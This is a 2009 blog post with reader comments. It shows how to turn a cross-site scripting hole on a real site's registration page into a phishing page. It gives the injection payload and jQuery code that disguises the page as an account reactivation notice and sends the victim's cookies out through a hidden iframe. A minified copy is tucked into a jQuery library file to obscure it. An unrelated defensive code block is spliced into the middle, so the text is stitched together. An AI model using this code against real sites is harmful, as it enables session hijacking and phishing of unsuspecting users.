
Saturday, May 16, 2009

Phishing With jQuery - Registration.Lycos.Com

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate, turning it into what appears to be a reactivation link that users must click to keep their accounts. When the user navigates to the page, the malicious code reads the cookie value and sends it to us through an anonymous mailing service. All of this happens transparently while the user is waiting to be redirected to

First, we need the vulnerability.'/><script>alert('Hello, World');</script> will work.

Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to

$(this).load(function() {
    // Retitle the page so the tab reads like a reactivation notice
    $('title').html('Reactivation');
    // Replace the login form with a fake "reactivated" message and a container for the hidden iframe
    $('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href=""></a>...');
    // Build the anonymous-mailer URL with the cookie as a parameter (mailer address elided in the original)
    var u = '' + escape(document.cookie) + '&kind=html';
    // A hidden iframe pointed at that URL submits the cookie without anything visible to the user
    $('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');
    // Redirect after five seconds so the visit looks like a normal reactivation flow
    setTimeout("window.location='';", 5000);
});

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:

[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href=""></a>...');var u=''+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.

'/><script src=""></script>
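As an added defender-side example (not code from the original post): the same reflected value rendered with attribute encoding, so the '/><script> break-out shown above never leaves the attribute, together with a check that a Set-Cookie header carries HttpOnly so document.cookie cannot hand the session to injected script. The form markup, escapeHtml, renderForm, cookieReadableByScript and the sample cookie header are assumptions made for this example.

```javascript
// Added example, not part of the original post. The form markup, function
// names and sample cookie header below are constructed for illustration.

// Encode a string for safe use inside a quoted HTML attribute or a text node.
function escapeHtml(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, function (c) { return map[c]; });
}

// Render a registration form that reflects the submitted value into the
// value attribute. vulnerable=true reproduces the unencoded reflection the
// post relies on; vulnerable=false is the corrected rendering.
function renderForm(reflected, vulnerable) {
  var v = vulnerable ? reflected : escapeHtml(reflected);
  return "<form><input type='text' name='u' value='" + v + "'/></form>";
}

// Count opening <script tags the browser would actually parse from the markup.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Report whether a Set-Cookie header leaves the cookie readable from
// document.cookie (the channel the post's script uses). HttpOnly blocks it.
function cookieReadableByScript(setCookieHeader) {
  var attrs = setCookieHeader.split(';').slice(1).map(function (a) {
    return a.trim().toLowerCase();
  });
  return attrs.indexOf('httponly') === -1;
}

// The proof-of-concept payload quoted in the post.
var PAYLOAD = "'/><script>alert('Hello, World');</script>";
```

Run scriptTagCount over renderForm(PAYLOAD, true) and renderForm(PAYLOAD, false) to see the injected script tag appear only in the unencoded rendering.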


  1. very cut and dried, easy to understand. You should be a technical writer.

  2. Ummm, thanks a lot. So now all my private emails and account data is being sent to whom? Grrr, so crazy to think I'm a person who gives lots of my own free-time volunteering in my community and helping people out, and you are doing your best to fuck people over. What a crazy shitty world.

  3. I think someone actually took your code and totally screwed up Lycos for real. Perhaps you should look into it and help them sort it all out before you get a call from about a million lawyers - especially ones from Lycos.

  4. John,

    What does this mean for all of us who are now locked out of our Lycos free email accounts?

  5. What does this mean now that we've all given away our usernames & passwords?!? Or are they only after our credit card numbers?

  6. First off, thanks to all for the feedback! Unfortunately this will not help anyone recover their free Lycos email account. As to whether the information contained in this post was used in a malicious manner, I do not know. If it was, such an occurrence would be unfortunate and I certainly would not condone the acts of the individual(s) involved. This was posted for informational purposes only. Any anger should be redirected to those that provide a premium service with gaping holes in it. Exactly what information can be compromised using this vulnerability I am unsure of; I do not have a Lycos email account.

    1. I can not agree more with you!

  7. LMAO ... that is awesome!

  8. I am, of course, a newcomer to this blog, but the author does not agree

  9. January 16, 2011 and the security problem is still there!! Glad I don't have a Lycos account!


  14. Nice to meet you, boss. Just out for a morning walk here.
